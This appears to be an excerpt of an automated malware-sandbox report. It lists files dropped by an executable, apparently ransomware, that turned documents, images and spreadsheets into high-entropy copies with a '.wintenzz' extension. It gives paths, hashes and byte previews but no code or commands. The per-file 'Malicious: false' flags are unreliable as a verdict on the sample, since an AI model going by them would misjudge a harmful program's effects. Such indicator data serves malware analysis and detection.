Preview:	................LAj1Oq8CwhX3FMSdWGh2r2xO........;.....1..B...N..9...r....gnu.B..:...."NS.%.J....P..P.!`.h.K.!.%.W....?....."..U.$X..@..`dD$.h.D..q.....<..Hf.:..#o..R...H.-Z.[..k..2..l..Lm....#..-.6...A....OP7/.......=~.;d.T.....s......m4.[Y.$..S.>.e.G.V.i....I.v.....#...'6.Peb.>..#..7."".(.0n..wI.q.I$T%..9.5.:..l.M...../.\|.f.........N....WF....x..R%X(.F..U[......W.u..@.T..f....FP....}...iC...W'..6t D...6;.:.Nzi.S...<.n..1.:.2u.0.R...3...y.K?Y3..a:..f.Ar....5dn.i..N....Q\.j(..$I.L............3.......U.O6.........d..x..Z5@..+8f.......o5.....%....R..>..M.5..y....B...T[....G.D...W.b.,.6.`Y.....DG7.B.)BQ".Kn....~6,..yb....u+..P...G...t..\W!Jk..h'....c.+E..iI. ......g'.j..hdR.VL..!\|...":....7.a..#...)....#..jA:E...{.Y.....M.Tp.3..+##2..1M....D.....1gI...(.l..^Q.....Y]v..E.s..R......i...._......K1.G..r.=..}..F.V..... .u..Jge..M........q.$.....,.....x..m.....@=:W...5.K.e...2&*y..I.].K......._r1.....-z....^....B.5:.<...6......$.....=..`..J}Y.

C:\Users\user\Documents\DQOFHVHTMG\UBVUNTSCZJ.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.814859508212213
Encrypted:	false
SSDEEP:	24:gEM/buw07YAc/S5FvYfe4RZUtC5tHhM6/OErHVpL9Nom6qcTg+h:gEMKw07YAc/S5ZYf7HoCfHh7/OE51bcz
MD5:	BFE64CA815F5BFD5DDE2BE6B1C2CEF5E
SHA1:	C664CCA6A7D0579D92DA193D4960B2C80A182F48
SHA-256:	616448D9853401344AF1E760263BBD746841E71893FD245F103FBD11CBEBC64A
SHA-512:	6167748C9F70524EC9B745E86B685B9B02247ECC8C743A68C2041E83AA96E3F11DBED3D33F42AEFF50BCF3AA65572EC043C1E415905E745F27288E86C1237702
Malicious:	false
Preview:	................LAj1Oq8CwhX3FMSdWGh2r2xO........;.....1..B...N..9...r....gnu.B..:...."NS.%.J....P..P.!`.h.K.!.%.W....?....."..U.$X..@..`dD$.h.D..q.....<..Hf.:..#o..R...H.-Z.[..k..2..l..Lm....#..-.6...A....OP7/.......=~.;d.T.....s......m4.[Y.$..S.>.e.G.V.i....I.v.....#...'6.Peb.>..#..7."".(.0n..wI.q.I$T%..9.5.:..l.M...../.\|.f.........N....WF....x..R%X(.F..U[......W.u..@.T..f....FP....}...iC...W'..6t D...6;.:.Nzi.S...<.n..1.:.2u.0.R...3...y.K?Y3..a:..f.Ar....5dn.i..N....Q\.j(..$I.L............3.......U.O6.........d..x..Z5@..+8f.......o5.....%....R..>..M.5..y....B...T[....G.D...W.b.,.6.`Y.....DG7.B.)BQ".Kn....~6,..yb....u+..P...G...t..\W!Jk..h'....c.+E..iI. ......g'.j..hdR.VL..!\|...":....7.a..#...)....#..jA:E...{.Y.....M.Tp.3..+##2..1M....D.....1gI...(.l..^Q.....Y]v..E.s..R......i...._......K1.G..r.=..}..F.V..... .u..Jge..M........q.$.....,.....x..m.....@=:W...5.K.e...2&*y..I.].K......._r1.....-z....^....B.5:.<...6......$.....=..`..J}Y.

C:\Users\user\Documents\DQOFHVHTMG\WHZAGPPPLA.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.782627027468277
Encrypted:	false
SSDEEP:	24:2Wdf4qfkKvKK/m5sZyDn+k3bePenA4HNxw4HHopXM:nfAKvPm5gY+krem9NxwgoO
MD5:	52391C568393500DA78A926C86BE8928
SHA1:	67F393FD0E8AB5F0378E110601C88A0D4FC34543
SHA-256:	5EA6806F422B99B90ED746B8355FAC06EA45E225B593C92A3943179C07882A1E
SHA-512:	0C0657BD4B0D409B97269B53D22AB6B95FCD8621EFEDB37B675ED6364006BD111A881D2230DD1F93A2F0DC60F7E21AEB34C1A2A82E50E406396C09D71124460E
Malicious:	false
Preview:	................BES1bzWDaN8a5qv8tEw89KyX............X...km.........\.u`...L.8.)MB....;...oh""./.q....\y.Fq..b..\.]........id...7..W......1(y.F./E+\.......}3..;.E..=\...@%.Y.....=-.&...l.DsY.2I3...1U.......W.....d.!b.auf~..[.$.WW..V..8B.M`~.2v..{.f....\e.2.Aif....X..1.$rIJ.]....(....w.....T4....i..8....!..-..&`#.kp...x...^.zKr..w8.6...{.X.1.&....V.g..A.I.....2.+..v<nU...&.,..i.Y...%..G...o...l%..?.....^.O.2......j.-...8..-y.............n...Y.$...G..3!..W1....)...........J$..ny.#.<m.r...<.F...w...f.8....!.......:...U.r..&..')2.}fyVrK.B...b.a..1......75E..?.2!..-\.S...Z..U{@.......E].U+g{.VK.9.G:.."R.....).%7.5.......C[.....]..)..H..b.-.. .rJc9..{..eM?F...X.~.Uy./..y.RS.F..HpL..f..0.Stj.>.....A.57*..?W$(<..]Ei.a...&_.T[..].R....H.#d.8.^.2..)../...nT"...eM.F..w.)s....n..tO@w..HO......'....4..k..{[d.6...%:..C.V.....I.J....w.C..`[s<<.W.>.\8.t.!,.....xd....]....Y.....U.;..=.....^...c.z}b.`$.^...k...5s...R.).L..z.=....t.^.>.'.......2.{...E.5

C:\Users\user\Documents\DQOFHVHTMG\WHZAGPPPLA.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.782627027468277
Encrypted:	false
SSDEEP:	24:2Wdf4qfkKvKK/m5sZyDn+k3bePenA4HNxw4HHopXM:nfAKvPm5gY+krem9NxwgoO
MD5:	52391C568393500DA78A926C86BE8928
SHA1:	67F393FD0E8AB5F0378E110601C88A0D4FC34543
SHA-256:	5EA6806F422B99B90ED746B8355FAC06EA45E225B593C92A3943179C07882A1E
SHA-512:	0C0657BD4B0D409B97269B53D22AB6B95FCD8621EFEDB37B675ED6364006BD111A881D2230DD1F93A2F0DC60F7E21AEB34C1A2A82E50E406396C09D71124460E
Malicious:	false
Preview:	................BES1bzWDaN8a5qv8tEw89KyX............X...km.........\.u`...L.8.)MB....;...oh""./.q....\y.Fq..b..\.]........id...7..W......1(y.F./E+\.......}3..;.E..=\...@%.Y.....=-.&...l.DsY.2I3...1U.......W.....d.!b.auf~..[.$.WW..V..8B.M`~.2v..{.f....\e.2.Aif....X..1.$rIJ.]....(....w.....T4....i..8....!..-..&`#.kp...x...^.zKr..w8.6...{.X.1.&....V.g..A.I.....2.+..v<nU...&.,..i.Y...%..G...o...l%..?.....^.O.2......j.-...8..-y.............n...Y.$...G..3!..W1....)...........J$..ny.#.<m.r...<.F...w...f.8....!.......:...U.r..&..')2.}fyVrK.B...b.a..1......75E..?.2!..-\.S...Z..U{@.......E].U+g{.VK.9.G:.."R.....).%7.5.......C[.....]..)..H..b.-.. .rJc9..{..eM?F...X.~.Uy./..y.RS.F..HpL..f..0.Stj.>.....A.57*..?W$(<..]Ei.a...&_.T[..].R....H.#d.8.^.2..)../...nT"...eM.F..w.)s....n..tO@w..HO......'....4..k..{[d.6...%:..C.V.....I.J....w.C..`[s<<.W.>.\8.t.!,.....xd....]....Y.....U.;..=.....^...c.z}b.`$.^...k...5s...R.).L..z.=....t.^.>.'.......2.{...E.5

C:\Users\user\Documents\IZMFBFKMEB.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.804663704603324
Encrypted:	false
SSDEEP:	24:qRxSmEBpWFaYH/6VGZYVgNTW0CdQC4N4bTnhMSSZyswHDLdC+agn:qemUWEa/60ZYVgN9C+C4NATuNyskDc+7
MD5:	308DF92F5CD6CA9939EF05D0F889092F
SHA1:	4F9D8917B752D047CE569B072C6AE10CE839C443
SHA-256:	2CA6283C01007D7F1EA32AB9F196EAF251038ECCB59C2324A0949D54643790AF
SHA-512:	C68BDCD6B15565875D3A1C0BBC324C05863ECF8E3B8553C44FAA485B4D696D17F8580A5C9A2295593E1725BC902466B76B148AE1AB1908076D9A419C3EE3897A
Malicious:	false
Preview:	................hpaHQdPpHkfUthut3Se8Oe0i........OPT..k..;'..$.\|~....n.MD...M8^........8Yj...\.F.H.XI&.."..{...+C.y.wa.h6.......y...1..6....g-AoM.g..[GqXh+.5.Y L!.....5F..i9..K H........j;.#......J4Td.....>.^.({b.[.'L#D.A...hL/ [jq..w.......8..J.D2............J..._.#h.&o...pc..g..t..P..w.....sBu...#...ni.F..h.....ou.M)..RU.u.^......K......d...J....T...[g\|8..........'.3.08..x.8..."r..o5..}>w...4..6..0.3E_.~...X.Ov7.....+....\|.......>...5.^.Y;....z.T.Q.\|....<.g.f....F..^......s.(r..yc.j...r...N...;V.I;.[..+..\..J...9a..\|.Y.[........1.].FM.J...{(c..N.......).q..,9...{..H...x...%..{`t.=.$.N.I...G...n.2.0..Zxs..y...+~f%.kk..H.q.B..a.....^7g.n..<.(..)z......FX.7.AG^.t...c1.M=...w..;.:..O...?..(..'....W..<. 5R...T...?$...x.D.z[...G.S..t..6..J.f._3C.g!...}4..sB......h.r.s....{...,t....5.A/%.3..G.V..~C........A15b...D.A#.....\..+.......2Y".u.P... 2v..y9Bf....D.@....V....nb..&/v.\|.2.g......<....~ar.VmU..J.8..&......+..A.ab..L.....4..aW..$n......[

C:\Users\user\Documents\IZMFBFKMEB.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.804663704603324
Encrypted:	false
SSDEEP:	24:qRxSmEBpWFaYH/6VGZYVgNTW0CdQC4N4bTnhMSSZyswHDLdC+agn:qemUWEa/60ZYVgN9C+C4NATuNyskDc+7
MD5:	308DF92F5CD6CA9939EF05D0F889092F
SHA1:	4F9D8917B752D047CE569B072C6AE10CE839C443
SHA-256:	2CA6283C01007D7F1EA32AB9F196EAF251038ECCB59C2324A0949D54643790AF
SHA-512:	C68BDCD6B15565875D3A1C0BBC324C05863ECF8E3B8553C44FAA485B4D696D17F8580A5C9A2295593E1725BC902466B76B148AE1AB1908076D9A419C3EE3897A
Malicious:	false
Preview:	................hpaHQdPpHkfUthut3Se8Oe0i........OPT..k..;'..$.\|~....n.MD...M8^........8Yj...\.F.H.XI&.."..{...+C.y.wa.h6.......y...1..6....g-AoM.g..[GqXh+.5.Y L!.....5F..i9..K H........j;.#......J4Td.....>.^.({b.[.'L#D.A...hL/ [jq..w.......8..J.D2............J..._.#h.&o...pc..g..t..P..w.....sBu...#...ni.F..h.....ou.M)..RU.u.^......K......d...J....T...[g\|8..........'.3.08..x.8..."r..o5..}>w...4..6..0.3E_.~...X.Ov7.....+....\|.......>...5.^.Y;....z.T.Q.\|....<.g.f....F..^......s.(r..yc.j...r...N...;V.I;.[..+..\..J...9a..\|.Y.[........1.].FM.J...{(c..N.......).q..,9...{..H...x...%..{`t.=.$.N.I...G...n.2.0..Zxs..y...+~f%.kk..H.q.B..a.....^7g.n..<.(..)z......FX.7.AG^.t...c1.M=...w..;.:..O...?..(..'....W..<. 5R...T...?$...x.D.z[...G.S..t..6..J.f._3C.g!...}4..sB......h.r.s....{...,t....5.A/%.3..G.V..~C........A15b...D.A#.....\..+.......2Y".u.P... 2v..y9Bf....D.@....V....nb..&/v.\|.2.g......<....~ar.VmU..J.8..&......+..A.ab..L.....4..aW..$n......[

C:\Users\user\Documents\LHEPQPGEWF.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.78139002793094
Encrypted:	false
SSDEEP:	24:Zek4qURJkDLOmqNsu0e4Bx2n5Wz7w48PgCk0Qn8WBqFAVUK:Zek45Wxu0VmegHDQn8WBqFgUK
MD5:	D3982DD5A0F1BE6D0647DB98F1DFC361
SHA1:	F3FF59E233E2501EE382FB6122C8EEB47E6A1D42
SHA-256:	FF09BA75493082FA7EFC93FC8F5D51575E68EBB7E139E814C98964648F4C73A0
SHA-512:	6285A8E53353EFF4E0904DEE4C54EECCDF5F8D49F051C584A2D7C53EA836B3606B54DAAE01EDDEF66F7788D16179E899ADAC339F75587335E63F9D9E55CDFE5B
Malicious:	false
Preview:	................HBaSuPBP0ydESuapfEQa4hSI........_'".....}.....)J...(.K}r@..b...cO]...%.W............<=.T;..P.....@..$.{..[...r.<M.]j?....[..DX..[..@.Z.....O..$>..{9.?.5.5......>X.I.E...&.a8f.ocl.?y.....(11. "1%.k1F.\.`..X.EFE.Z_.3...@].gR..)./...........7...W...q=.afS{..O....5Bl....0.........<@[..0...<.a..3...C'.".V. .H...[...P.T.;...,zC`.F`+......A.....3.WP.Jc^[.-;\|A0....BZ.Z......1%.p.P7..q.:4\|.....K.w]......"V.].b.x....9T.h...m...0.-}.A.y..(.....&B.T...k...<...I.J......L.wp$.uiX......P.@.....B.}<H.....".;"...b.I.2.J.u....._....l.n..F6.e.>...NO..TC:b...n..>..$.<.=}....C.&..U....(...&V..I.$.nU.,2....s.V....a..+.z..p-_.S@Q.h.+X=...K......Cj>>i].O.2/WQ@.A....[...aik...'..P.......P<....E.h{.d5#-........C......\|.De.C..........M../...\|BM.a._..g.K..6.x...........QH....e.!...@P.(0}R....P.+L.."J...'.p..i.N.j.~=...8_.........R..z.P.,..8..M....Sthf..5.6....0..U......U......pd)....rD.......^a...!..E...;.aDU........$ .q.]..D;W.t.....x..$..

C:\Users\user\Documents\LHEPQPGEWF.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.78139002793094
Encrypted:	false
SSDEEP:	24:Zek4qURJkDLOmqNsu0e4Bx2n5Wz7w48PgCk0Qn8WBqFAVUK:Zek45Wxu0VmegHDQn8WBqFgUK
MD5:	D3982DD5A0F1BE6D0647DB98F1DFC361
SHA1:	F3FF59E233E2501EE382FB6122C8EEB47E6A1D42
SHA-256:	FF09BA75493082FA7EFC93FC8F5D51575E68EBB7E139E814C98964648F4C73A0
SHA-512:	6285A8E53353EFF4E0904DEE4C54EECCDF5F8D49F051C584A2D7C53EA836B3606B54DAAE01EDDEF66F7788D16179E899ADAC339F75587335E63F9D9E55CDFE5B
Malicious:	false
Preview:	................HBaSuPBP0ydESuapfEQa4hSI........_'".....}.....)J...(.K}r@..b...cO]...%.W............<=.T;..P.....@..$.{..[...r.<M.]j?....[..DX..[..@.Z.....O..$>..{9.?.5.5......>X.I.E...&.a8f.ocl.?y.....(11. "1%.k1F.\.`..X.EFE.Z_.3...@].gR..)./...........7...W...q=.afS{..O....5Bl....0.........<@[..0...<.a..3...C'.".V. .H...[...P.T.;...,zC`.F`+......A.....3.WP.Jc^[.-;\|A0....BZ.Z......1%.p.P7..q.:4\|.....K.w]......"V.].b.x....9T.h...m...0.-}.A.y..(.....&B.T...k...<...I.J......L.wp$.uiX......P.@.....B.}<H.....".;"...b.I.2.J.u....._....l.n..F6.e.>...NO..TC:b...n..>..$.<.=}....C.&..U....(...&V..I.$.nU.,2....s.V....a..+.z..p-_.S@Q.h.+X=...K......Cj>>i].O.2/WQ@.A....[...aik...'..P.......P<....E.h{.d5#-........C......\|.De.C..........M../...\|BM.a._..g.K..6.x...........QH....e.!...@P.(0}R....P.+L.."J...'.p..i.N.j.~=...8_.........R..z.P.,..8..M....Sthf..5.6....0..U......U......pd)....rD.......^a...!..E...;.aDU........$ .q.]..D;W.t.....x..$..

C:\Users\user\Documents\NIRMEKAMZH.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.803468270552302
Encrypted:	false
SSDEEP:	24:TvY6qpa0WN8xXbEOF1+OsY4K6HqTm07QsMuR/rA36WOpLl:TvYF5MK/FsK6HqTrkeUkh
MD5:	EF5CCC350F41ED326385703A2906BCC0
SHA1:	34161B606F25164227732E46E7864EEA071FA869
SHA-256:	BEFF092EE6C2E00DC940FDB25AB6433A428AD3127A2439501AB0A5F5D62EB958
SHA-512:	7E361341C7AD4A3FBD395769947D54D40D59C4752BABE83F4FC4644A66B0787B8707B854023A4BFDDA0183EC67042E133C75194A0BDEBD751990D051926D91D2
Malicious:	false
Preview:	................Y3rg7afb5h9lrk3QTk8d9cfM..........\.v...J@%;.>.."K(e...Ep..3m4.X........`....3,.j..DS..t...m..Lht.....-..4-.....xx..j..>.."}"..!..x7...v....RK.=.G..uc....Y....%...(...c....`..?5..d..IC1..V.9.g:.0..}0~.T...E..._]...>.;...x .U1....S...2.'.si.......q....e.K.ui!Xk_~U..sXvln..C.....T.>..H4k.....T9..<i..N...0.]....Q......9.Yd..<L9......'...2...@.?.r.yY..,].v...N. ....K*.c."r/.=."....K.8..E.C.f...^.A..!<~.c..?.r.Z...O..k_X.I)...2.l.l...B.3..#..'7.q7.....AQ..].....`3...1E....`..4......m........E........x....3..DA....W.q..+..f.5.......f.{.,.E....n.C..D....m..Dz...l. ........U7..>.....2.....~..oh..f..R...=5.....<....Gr.23...k....1....)...~E..p..n.=....>.-......P6.....!...w...<..\|8W.\....x/.8......w.R.)0.B..w.#..b.\|R\|........P....z-;.M@..jh......-..-...hr`.......(.1.9....x....k....J.P..=xw.4b..?.C...z..5.kD{.c.{.Gn.DxP...$X..N..0....,....P..<9....C1j......C.BeX~3...s..S-..p..."...W6.D..6.....0sV....0...f..x{9.DJ.&./.lx

C:\Users\user\Documents\NIRMEKAMZH.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.803468270552302
Encrypted:	false
SSDEEP:	24:TvY6qpa0WN8xXbEOF1+OsY4K6HqTm07QsMuR/rA36WOpLl:TvYF5MK/FsK6HqTrkeUkh
MD5:	EF5CCC350F41ED326385703A2906BCC0
SHA1:	34161B606F25164227732E46E7864EEA071FA869
SHA-256:	BEFF092EE6C2E00DC940FDB25AB6433A428AD3127A2439501AB0A5F5D62EB958
SHA-512:	7E361341C7AD4A3FBD395769947D54D40D59C4752BABE83F4FC4644A66B0787B8707B854023A4BFDDA0183EC67042E133C75194A0BDEBD751990D051926D91D2
Malicious:	false
Preview:	................Y3rg7afb5h9lrk3QTk8d9cfM..........\.v...J@%;.>.."K(e...Ep..3m4.X........`....3,.j..DS..t...m..Lht.....-..4-.....xx..j..>.."}"..!..x7...v....RK.=.G..uc....Y....%...(...c....`..?5..d..IC1..V.9.g:.0..}0~.T...E..._]...>.;...x .U1....S...2.'.si.......q....e.K.ui!Xk_~U..sXvln..C.....T.>..H4k.....T9..<i..N...0.]....Q......9.Yd..<L9......'...2...@.?.r.yY..,].v...N. ....K*.c."r/.=."....K.8..E.C.f...^.A..!<~.c..?.r.Z...O..k_X.I)...2.l.l...B.3..#..'7.q7.....AQ..].....`3...1E....`..4......m........E........x....3..DA....W.q..+..f.5.......f.{.,.E....n.C..D....m..Dz...l. ........U7..>.....2.....~..oh..f..R...=5.....<....Gr.23...k....1....)...~E..p..n.=....>.-......P6.....!...w...<..\|8W.\....x/.8......w.R.)0.B..w.#..b.\|R\|........P....z-;.M@..jh......-..-...hr`.......(.1.9....x....k....J.P..=xw.4b..?.C...z..5.kD{.c.{.Gn.DxP...$X..N..0....,....P..<9....C1j......C.BeX~3...s..S-..p..."...W6.D..6.....0sV....0...f..x{9.DJ.&./.lx

C:\Users\user\Documents\PWZOQIFCAN.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.808346037826066
Encrypted:	false
SSDEEP:	24:UJqFzafBDX+s0QmCXkLCEXlE04/mbfkO2aoJrwvmEcs:UJq4fBrt0rLXlrrkTvwvmEh
MD5:	0D83807BD780445DA3DBB6B7E7AA584E
SHA1:	D71AE4DBEB4B30DD3750D0D44C62275E248E7B68
SHA-256:	DF27ABF74EBC6A733D29780D92C8D0DAB51F88C390D625A522A9895F7D7EDA60
SHA-512:	D82031F20586B2521CDCB63EA2A8323B8710F493B756B16E97D83404F919FA2CC21241764CF03355694DE88C4592DB6DDF11303DC61B624C3F5D63EBE9A21331
Malicious:	false
Preview:	................wO3rAbUCk85oV14LOOMTKAzZ..............O...&p.....}sB......f....un.YP.q.D.,B]r...Jfw....R3..Y=XI....Z..1..l'..i..}/..H..Q..y.....u.......h....U(y...3"..EcNr..Jg.Z....l....A......I1.l......4....#.(.o.....=...S.............0.;J0.,.$1.H..60...y.=.a".....=..lb...bU.1.e.`.t.....7>vrUo..+yZ.n7....v....8=.pj..x....xC.:........bR.\|..F...W..R..{.^.....V.PM......OD..kC@6c..th..rN..R....Sd....:.E..3Q.....#.QG.@N..i..&N~!Y..wA...q.y...e.GB.....6.Kg..O...z........l.Ab.p.C;.+7...i./..?..Y~."....?b.G....%)..xh+.xP7.z....!j.V0.B..........Q.'Q.<.>...M.+j..#...[.J.7N..\|ZJ....^.R$b..?....L9......;."..[.........F..X...X.:m....g.bj..e....R..6...q..,?...i..v.QkpHR+..x.PQ#I..etn...dKgE/.o...B.......9...&.1>{.A#Gi8..R^..y.$..G.G.k...*..;/...L?x..:?.....P;.!w..n.@.V..lG.V.E]..".y..n.<.i....r.}....f....m)._....r/.bu.-.. ....(N@m.c....2....?..ob:...dm.y.........{...<...o...i-yu...Y[#W.A.C.W.4/u.^]=.4......w.1.Q.VT1...i...pFA..]..@..G;.Z

C:\Users\user\Documents\PWZOQIFCAN.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.808346037826066
Encrypted:	false
SSDEEP:	24:UJqFzafBDX+s0QmCXkLCEXlE04/mbfkO2aoJrwvmEcs:UJq4fBrt0rLXlrrkTvwvmEh
MD5:	0D83807BD780445DA3DBB6B7E7AA584E
SHA1:	D71AE4DBEB4B30DD3750D0D44C62275E248E7B68
SHA-256:	DF27ABF74EBC6A733D29780D92C8D0DAB51F88C390D625A522A9895F7D7EDA60
SHA-512:	D82031F20586B2521CDCB63EA2A8323B8710F493B756B16E97D83404F919FA2CC21241764CF03355694DE88C4592DB6DDF11303DC61B624C3F5D63EBE9A21331
Malicious:	false
Preview:	................wO3rAbUCk85oV14LOOMTKAzZ..............O...&p.....}sB......f....un.YP.q.D.,B]r...Jfw....R3..Y=XI....Z..1..l'..i..}/..H..Q..y.....u.......h....U(y...3"..EcNr..Jg.Z....l....A......I1.l......4....#.(.o.....=...S.............0.;J0.,.$1.H..60...y.=.a".....=..lb...bU.1.e.`.t.....7>vrUo..+yZ.n7....v....8=.pj..x....xC.:........bR.\|..F...W..R..{.^.....V.PM......OD..kC@6c..th..rN..R....Sd....:.E..3Q.....#.QG.@N..i..&N~!Y..wA...q.y...e.GB.....6.Kg..O...z........l.Ab.p.C;.+7...i./..?..Y~."....?b.G....%)..xh+.xP7.z....!j.V0.B..........Q.'Q.<.>...M.+j..#...[.J.7N..\|ZJ....^.R$b..?....L9......;."..[.........F..X...X.:m....g.bj..e....R..6...q..,?...i..v.QkpHR+..x.PQ#I..etn...dKgE/.o...B.......9...&.1>{.A#Gi8..R^..y.$..G.G.k...*..;/...L?x..:?.....P;.!w..n.@.V..lG.V.E]..".y..n.<.i....r.}....f....m)._....r/.bu.-.. ....(N@m.c....2....?..ob:...dm.y.........{...<...o...i-yu...Y[#W.A.C.W.4/u.^]=.4......w.1.Q.VT1...i...pFA..]..@..G;.Z

C:\Users\user\Documents\PWZOQIFCAN.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.784456501868524
Encrypted:	false
SSDEEP:	24:8mTX3YlSzQZzwvqyy6/ZpcHAYeR7onp1YmLbtn2T5hxHWzzeC4J5iC:djY8rHROr+5riK7SC
MD5:	2C0D72195FFF56EB034D0788F32D1858
SHA1:	60C698402C6ECD50089AA59FD801A70CBD728F8A
SHA-256:	146E5703091686DCF44DEAD8E9BEC4590FFD3AC0F23918E5041E91C6C636A992
SHA-512:	72BF5F36D9AD97838EF79462D9AA0F9502FDA2CEC7B49C813E94618B86F841D11A709C2492F66A78953FDBED2813320AD02D7F0EC5C5F0634CA6DD684AFAD677
Malicious:	false
Preview:	................lakO8Q2dLMOTosZYD39iTxCR.........aH.5UaQX0.G..\|.Oy.S^.:....x.&..Z....O.......;......@R;....0<...P.v.Nj..}R...0...Y..;E.g...o.!1.Fy...ev.]jN...U......Y"..L%..0Mb.............y4._I..e..!.....]g..S.q......l.<.[1../.6....s1...w..h=..H...&.......!)..V..$.q..&....C<......6......)....X#....c.<...rQ2....b....K<V.x....nm....tC......u#.{$...!wp.....AO.Bj.....aN..e...m.T.;..e>/i...1.3....h...\.....l..'.s..z....1.UQ....)...u..+...l1...G..iTR.......W..:....d.p.+O.>.J.Y...#]L%....hr....z...f.1.{..T....]...\Bm.f....6...t..C............V.f-.D..s..0vN..F...M......EA^....U.'...w.-.........\|....1.....EEg..;.5......>.n=,6UmK...EQKx..3.>w.7...m..7...Yz%...w.ht.nq...4..H.C.p.Zu.....@.....\B.w2.qG............h...P....-B+. ^..........koA4.ZE.0.......... 9Hv..M..,..g.6.^.......\|#.Q.k^.mt.2......9.%I(..6.1....i.N.5s.(.a.........k.....I.v..U:S.l..+...\...jY7..-cql..]...]....O.`..m.UI._XS.y...l..3....+..G.op...v...O..&..$...Q..8.D.....h..2+

C:\Users\user\Documents\PWZOQIFCAN.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.784456501868524
Encrypted:	false
SSDEEP:	24:8mTX3YlSzQZzwvqyy6/ZpcHAYeR7onp1YmLbtn2T5hxHWzzeC4J5iC:djY8rHROr+5riK7SC
MD5:	2C0D72195FFF56EB034D0788F32D1858
SHA1:	60C698402C6ECD50089AA59FD801A70CBD728F8A
SHA-256:	146E5703091686DCF44DEAD8E9BEC4590FFD3AC0F23918E5041E91C6C636A992
SHA-512:	72BF5F36D9AD97838EF79462D9AA0F9502FDA2CEC7B49C813E94618B86F841D11A709C2492F66A78953FDBED2813320AD02D7F0EC5C5F0634CA6DD684AFAD677
Malicious:	false
Preview:	................lakO8Q2dLMOTosZYD39iTxCR.........aH.5UaQX0.G..\|.Oy.S^.:....x.&..Z....O.......;......@R;....0<...P.v.Nj..}R...0...Y..;E.g...o.!1.Fy...ev.]jN...U......Y"..L%..0Mb.............y4._I..e..!.....]g..S.q......l.<.[1../.6....s1...w..h=..H...&.......!)..V..$.q..&....C<......6......)....X#....c.<...rQ2....b....K<V.x....nm....tC......u#.{$...!wp.....AO.Bj.....aN..e...m.T.;..e>/i...1.3....h...\.....l..'.s..z....1.UQ....)...u..+...l1...G..iTR.......W..:....d.p.+O.>.J.Y...#]L%....hr....z...f.1.{..T....]...\Bm.f....6...t..C............V.f-.D..s..0vN..F...M......EA^....U.'...w.-.........\|....1.....EEg..;.5......>.n=,6UmK...EQKx..3.>w.7...m..7...Yz%...w.ht.nq...4..H.C.p.Zu.....@.....\B.w2.qG............h...P....-B+. ^..........koA4.ZE.0.......... 9Hv..M..,..g.6.^.......\|#.Q.k^.mt.2......9.%I(..6.1....i.N.5s.(.a.........k.....I.v..U:S.l..+...\...jY7..-cql..]...]....O.`..m.UI._XS.y...l..3....+..G.op...v...O..&..$...Q..8.D.....h..2+

C:\Users\user\Documents\UBVUNTSCZJ.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.787310774245225
Encrypted:	false
SSDEEP:	24:56LK5w4hnJ8jWFbviiGGgYe/6GHi6b3/hRmUYKlywcpFBZOpI5mK:56LewHyFbKiDgYe/DD35rYSywczBZOG9
MD5:	D717EAD1669DECD6BC05B0694B97462D
SHA1:	25F36A0EDBD7710AB74E8FE829D63512D7D91CA8
SHA-256:	53FF66E0A937AC8ED9EE2A0904FE50A27BC4B82210F67F8FC407D94B333EC50C
SHA-512:	866D07FFDF1B86287A2119BB0A71A83439456B3395FCB9345A0AF1282E516CD890A94AD314CA964EA6A5DD46CBF7E4B308A1B3B501D7FB2230EEB781ABF19B2B
Malicious:	false
Preview:	................0cY4d4JKYKhpfguGLz1Inwzi.........E.....'.D.9.l$....yqsV8?5G...... @$.@....j..D.7....-....r4Ff...M..>N.....9..Vc..........c;....{.....P.\S"..hIO..5.b.....P...q.x?..;6.L..O.Hg....(....Du\|.../H..x....U...9.BN.t..l...g?r..W....."68u.L....i8..q\|p.n.@.............m)..84..c..B)L..#3....R..MD..d.>.?._.....EG....f....Y..^..l......C.-..i.l..A.?#.J.Fz.>..4J....Ss..g..7..........c..F.238......%....d...AD......A;..Q6.C...(..i.!....,\s....3.T".s.....G..J....o...^.b.eL...2..#.(.ve.q8.......'e.........V[.8BZ...c5........@x.....Wu.cQ..-.A...O.4...U._........\|.E.]..v...tS...x..^..S<l.x.c.:.Z.KC.....)-.~....0Z.{.;Q.....,..y...%..\..I..G=R................N..F.....$..0.e.C:......3..t.SA1..+..G.6.oP.J.xm....@0.c.D\.G.~...&T-..XBK-c..3i.be.....l<5#..'..<.m....Gy......m....N."4...b.....{..Sx.....O.F!t$7..._"...B<.>...K..iz7[0N4....5.7Y..d...G.....G.$..y"..Q..2..1[G.d...d...T?......1CFmq....K.M....m.r..7{]..I.>..H..;.h...<...H..%.a@.